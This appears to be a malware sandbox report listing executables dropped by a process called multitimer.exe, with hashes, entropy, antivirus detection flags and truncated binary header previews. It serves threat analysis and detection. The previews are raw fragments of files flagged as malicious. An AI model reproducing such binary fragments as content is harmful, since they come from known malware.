                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\fi2zlo3hx4f\g5qbddy2kmz.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):994304
                                                              Entropy (8bit):6.036504306101096
                                                              Encrypted:false
                                                              SSDEEP:24576:uxG8ox/wm+8tFB6NPPwmCjdhl6PdA+6FLTjv8ZxIQzXfAR+:uA9x/wSC5CIO
                                                              MD5:A0B220137332876ABC6DD8D91F2DD363
                                                              SHA1:C7F34A4F14DBDAFCEB52688C474E598EF2CEF3C4
                                                              SHA-256:9318F313739FE493CD524C55ADC5F1E2737E57049209245D6D917AAB83268DF8
                                                              SHA-512:0760C19274E1F480EC566973344867F52D6061A4E02D26E0F71770BDCB02C50BED12B4D179415213B0CE5DC0536C2B45C9F8A2AEBC46F53D98515785E66C718D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N7... ...@....@.. ....................................@..................................6..O....@..@....................`......`6..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......*..............@..B................/7......H........"..`............2..X............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
                                                              C:\Users\user\AppData\Local\Temp\hfhc33nmvzc\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\hir4xyivaso\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\hkjbg52kmqr\2mqvpn30gyk.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):994304
                                                              Entropy (8bit):6.036504306101096
                                                              Encrypted:false
                                                              SSDEEP:24576:uxG8ox/wm+8tFB6NPPwmCjdhl6PdA+6FLTjv8ZxIQzXfAR+:uA9x/wSC5CIO
                                                              MD5:A0B220137332876ABC6DD8D91F2DD363
                                                              SHA1:C7F34A4F14DBDAFCEB52688C474E598EF2CEF3C4
                                                              SHA-256:9318F313739FE493CD524C55ADC5F1E2737E57049209245D6D917AAB83268DF8
                                                              SHA-512:0760C19274E1F480EC566973344867F52D6061A4E02D26E0F71770BDCB02C50BED12B4D179415213B0CE5DC0536C2B45C9F8A2AEBC46F53D98515785E66C718D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.............N7... ...@....@.. ....................................@..................................6..O....@..@....................`......`6..8............................................ ............... ..H............text...T.... ...................... ..`.rsrc...@....@......................@..@.reloc.......`.......*..............@..B................/7......H........"..`............2..X............................................0..............!.....(.....(.......(....~....o....o.......o.......o.....o....o......s...........s.........s.........o ......2..,...o!.......,...o!.......,...o!......,..o!.......*..4....f..r........\.#.........P.<...................".("....*.r...p.....r#..p.....r5..p.....rG..p.....*..0..q...........!....(#...r...po$...s....o ...(....(......(%...o&...r...po'....(%....o(...t.............%.....o)...&........
                                                              C:\Users\user\AppData\Local\Temp\is-KTTI2.tmp\installer.tmp
                                                              Process:C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2570752
                                                              Entropy (8bit):6.387934906861299
                                                              Encrypted:false
                                                              SSDEEP:49152:rR/KpmZubPf2S8W2ILeWl+C1p9jWy5Mnd0wigbL:t/jtYLP1Sy5i0
                                                              MD5:B98F05A63FDC6865C82CB83483EE7286
                                                              SHA1:06BD6F94AAAB5462940B09D76CE1979E8108CEA1
                                                              SHA-256:0259CA56969BF3388F65985488CEBE287C0F592B4183B95EE415AD17F7F5F5FC
                                                              SHA-512:3B378A029FAA01EE8265DA9798AC5354FAAEAFED849BAD44131ABAE15DFF351689ED1D0C76A493CCE892D1C19506EEB4319128F580EA6937B35C4D3A7F70BDD0
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^..................%...........%.......%...@.......................... (...........@......@....................'.......&..5...0'...................................................... '.....................L.&.H.....&......................text.....%.......%................. ..`.itext...&....%..(....%............. ..`.data...dZ....%..\....%.............@....bss.....x...0&..........................idata...5....&..6....&.............@....didata.......&......@&.............@....edata........'......J&.............@..@.tls....D.....'..........................rdata..].... '......L&.............@..@.rsrc........0'......N&.............@..@............. (......:'.............@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\jkyaj5krzjz\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\lxr1opmnwjh\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\orsnadbtlac\5asqork1n2b.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\ow1l0zgmgaf\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\pa2g3jfiorw\tpwlxkeo40z.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):472064
                                                              Entropy (8bit):5.214292910977572
                                                              Encrypted:false
                                                              SSDEEP:3072:g41LuxQJrt7CV9k4X8Z1qbd96Bn/qarg8ABv0BVXkfq+0w1VglNfNKPzd8QsDZsR:b6QG6Bn/VFUi+Z7DUsw8YIp/
                                                              MD5:83BD1D79670EF5335E6533AE8285AB22
                                                              SHA1:B9FDDDE4C6655A262182991A0463F153309E83F7
                                                              SHA-256:7CD97A73F15ABE83611569B675E9C899131C9EA9A00B69D33BE31790BD034176
                                                              SHA-512:9CE068AE614030AFFB45280F33865A280D4014B5D26586C1FEA9AB474E2AA4AE9A4AAA6C05F6756AB8AB357236BDB2A18038D7F0478867E9721E8B0662020480
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......(.......)... ...@....@.. ....................................@.................................O)..O....@..d%...........................(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...d%...@...&..................@..@.reloc...............2..............@..B.................)......H.......0"..|............,................................................(....*.0..G.......r...p.....r...p.....r...p.....r...p.....r...p.....r)..p.....r...p.....*..0..p.......r...p...(....(....r...pr...po....(....%(....&(....r...pr...po....r...p(....(.......&....(......&.....(......&..*.(......MS........W.._........c..l........(....*Zs....~....(.....o....*..0..f.........,A.......%.~.....%.~.....%.~.....%.~.....%.~.....%.....(....(....&*.~....~....~....~....(....(....&*...0..
                                                              C:\Users\user\AppData\Local\Temp\psllnjovj2s\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\qhmeucfqke0\AwesomePoolE1.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):78336
                                                              Entropy (8bit):7.244203070790308
                                                              Encrypted:false
                                                              SSDEEP:1536:T3ckKSVogho+PTw/TPShe4Xl8iZDlJC1b:oUoGo+PWb6h9bJC5
                                                              MD5:0E5F029EB6ECABF1E593E12211887506
                                                              SHA1:B905E0A28ED76C0BB6F0871CC5FFFA2E7F99642A
                                                              SHA-256:77450DEC4277B5643CE97196289923C019E28A0EF9946324D924A6BB8833E7EC
                                                              SHA-512:AC42A24C4A0E34933466530AEBB86E01442070F7878614438732186C578296BD018E467868CE767FA8D32072C871F34DD7E221B38FFDC4E4967662F47F4FBAE3
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............"...0.............^2... ...@....@.. ....................................@..................................2..O....@..|....................`.......1..8............................................ ............... ..H............text...d.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......0..............@..B................>2......H........6..$"...........X.................................................}.....(.......(.....r...p(....&*6.rk..p(....&*....0..+.........,..{.......+....,...{....o........(.....*..0..L.............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....{....o......{....o......{....o......{....o......{.
                                                              C:\Users\user\AppData\Local\Temp\rohxg00x4ut\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\s1knrc5gdfb\v4ondyxg3no.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):721408
                                                              Entropy (8bit):6.793648961271186
                                                              Encrypted:false
                                                              SSDEEP:12288:9p/S3sCPfhmxjjpmt0OlIhtYbJAvSq8ZlUfMcZMSIP/LrvfOh9lSPxTmg++K0E:TeSot0jOFAvS7ZufMcZMT/feh9lEN+4
                                                              MD5:57664817E1CE6474C6FB8201675AC09E
                                                              SHA1:C394CB4643EA0BC6AC762DA6D95F4910957E34CB
                                                              SHA-256:8DB01993653B78C7B862356616241C4C97ADCE8B705522CEFAC90B23E3572845
                                                              SHA-512:D8EA64D8D2F695165E0AA1519348277E93D65C0A19AA810110E49F8F2AA6F015FC892D78C1B4B7B2FD70F933120B9A9887C214DCBDDBD293B8EF5BBF2549C64D
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ g..A.D.A.D.A.D.'.E.A.D.'.E.A.D.'.E.A.D.).E.A.D.).E.A.D.).E.A.D.'.E.A.D.A.D=A.D.(.E.A.D.(.D.A.D.(.E.A.DRich.A.D................PE..L....`.`.............................P............@.......................................@.....................................<................................M..........................@...........@...............0............................text....3.......4.................. ..`.txet.......P.......8.............. ..`.rdata..............................@..@.data...Ld..........................@....rsrc...............................@..@.reloc...M.......N..................@..B................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\uo02buchgfk\vpn.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15711928
                                                              Entropy (8bit):7.993466509508316
                                                              Encrypted:true
                                                              SSDEEP:393216:2fAlhvR8PZ5ECts3Rztsr5PSL0g7+Pgkt7/7DI:Dlhv2O1tfZi7//I
                                                              MD5:A9487E1960820EB2BA0019491D3B08CE
                                                              SHA1:349B4568DDF57B5C6C1E4A715B27029B287B3B4A
                                                              SHA-256:123C95CF9E3813BE75FE6D337B6A66F8C06898AE2D4B0B3E69E2E14954FF4776
                                                              SHA-512:DAB78AFF75017F039F7FEE67F3967BA9DD468430F9F1ECFFDE07DE70964131931208EE6DD97A19399D5F44D3AB8B5D21ABCD3D2766B1CAAF970E1BD1D69AE0DC
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....ujP.................P..........xd.......p....@..................................I...........@......................................(............{...C..........................................................P...L............................text....C.......D.................. ..`.itext.......`.......H.............. ..`.data........p.......T..............@....bss....PW...........b...................idata...............b..............@....tls.................r...................rdata...............r..............@..@.rsrc...(............t..............@..@.....................&..............@..@........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\v01sxozeepn\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....m^.................P...........^.......p....@...................................#...@......@...................@....... ..6....p...F............#.P....................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....F...p...F..................@..@....................................@..@........................................................
                                                              C:\Users\user\AppData\Local\Temp\v2nlk34vhpy\app.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):3953664
                                                              Entropy (8bit):7.994147516216309
                                                              Encrypted:true
                                                              SSDEEP:98304:PiYh58RGLPb/m86SUfCA3vuM5f56uH+BeWy50T9VuOGd:q+58Erb/mLfCA3vuM5fbeQWihh
                                                              MD5:CA391A385DA53FAE727E8B060FCB05C3
                                                              SHA1:FF84B68D99BFE9871BEC9AFFF4F7D8B8D804826F
                                                              SHA-256:69758B50E1E988C3D3EB40FA75AF54FCA809EE80DBAD18729C2F7D659D840FEE
                                                              SHA-512:83A3846D0411CFBD5B772BC4D0A1D1410D8499677F38BEB57AD525507D55258D3A812749E908F8076700504903017818492677BFB3E33A00B0E527ACC89281E2
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&^..b?..b?..b?..|m6.x?..|m'.U?..|m ..?..E..g?..b?...?..|m).c?..|m1.c?..|m7.c?..|m2.c?..Richb?..................PE..L......^..................;..bx......3........;...@.................................!`<.............................p0<......%<.<.......8.............................................................................;..............................text...b.;.......;................. ..`.rdata...P....;..R....;.............@..@.data...HWw..@<.. ....<.............@....rsrc...8............8<.............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\vvwtlhtocfa\safebits.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1188864
                                                              Entropy (8bit):6.330420574637555
                                                              Encrypted:false
                                                              SSDEEP:24576:LfBCw13MC2/8HmwB7nfoZarGKPO/HIO9:zBVx8b9
                                                              MD5:7504A339516D6AB6F35C55CD96810040
                                                              SHA1:4092FD230E20809D2D091976660FDCE49B171FF0
                                                              SHA-256:3CD0DDF012ACBDA18B37DF1E6EF4195D9BE15D6E58C97C7CC21CEABF54C32E56
                                                              SHA-512:A34A0F954BF02BE534FF85AB5789CFFE429729D5B71D8F47C2EF610B95D07E1C1D340FF648D04DBE99D02052BCFB63123E35A7A6584C18D4AE206DBF5050A4A4
                                                              Malicious:false
                                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................n...........{............@..............................................@..............................Z*..................................................................................................................CODE....Dl.......n.................. ..`DATA............. ...r..............@...BSS.....5................................idata..Z*.......,..................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc...............................@..P.....................$..............@..P........................................................................................................................................
                                                              C:\Users\user\AppData\Local\Temp\vwqpmvzrl2f\uhmrme5g5sj.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):472064
                                                              Entropy (8bit):5.214292910977572
                                                              Encrypted:false
                                                              SSDEEP:3072:g41LuxQJrt7CV9k4X8Z1qbd96Bn/qarg8ABv0BVXkfq+0w1VglNfNKPzd8QsDZsR:b6QG6Bn/VFUi+Z7DUsw8YIp/
                                                              MD5:83BD1D79670EF5335E6533AE8285AB22
                                                              SHA1:B9FDDDE4C6655A262182991A0463F153309E83F7
                                                              SHA-256:7CD97A73F15ABE83611569B675E9C899131C9EA9A00B69D33BE31790BD034176
                                                              SHA-512:9CE068AE614030AFFB45280F33865A280D4014B5D26586C1FEA9AB474E2AA4AE9A4AAA6C05F6756AB8AB357236BDB2A18038D7F0478867E9721E8B0662020480
                                                              Malicious:false
                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0......(.......)... ...@....@.. ....................................@.................................O)..O....@..d%...........................(..8............................................ ............... ..H............text........ ...................... ..`.rsrc...d%...@...&..................@..@.reloc...............2..............@..B.................)......H.......0"..|............,................................................(....*.0..G.......r...p.....r...p.....r...p.....r...p.....r...p.....r)..p.....r...p.....*..0..p.......r...p...(....(....r...pr...po....(....%(....&(....r...pr...po....r...p(....(.......&....(......&.....(......&..*.(......MS........W.._........c..l........(....*Zs....~....(.....o....*..0..f.........,A.......%.~.....%.~.....%.~.....%.~.....%.~.....%.....(....(....&*.~....~....~....~....(....(....&*...0..
                                                              C:\Users\user\AppData\Local\Temp\ych1rhrgxfs\installer.exe
                                                              Process:C:\Users\user\AppData\Local\Temp\B1S206CRD5\multitimer.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):2332000
                                                              Entropy (8bit):7.710319682123012
                                                              Encrypted:false
                                                              SSDEEP:49152:0qeNVO4AFpy6/dV7FuYuiiZQCu9f0BTHgXhfSUHq:BEY42x/NuBgJ0ZgXxxHq
                                                              MD5:57A499F8970931ED49142A0392846212
                                                              SHA1:6F9D93587B0508F278A7D1ED66590F50163A45BD
                                                              SHA-256:4101EB5D347E4D5DF349296B506BFA34443A7D43000902849A22545F455E23C0
                                                              SHA-512:A361DC8085D8CB35FFF1C8650C32E53F4CFD5A717369FD6F512497BE20AD6682270AE1C5CCC162FF56DB010D7D1F1E17869562A4AAED3B8D0E08D1D81C72C0C6
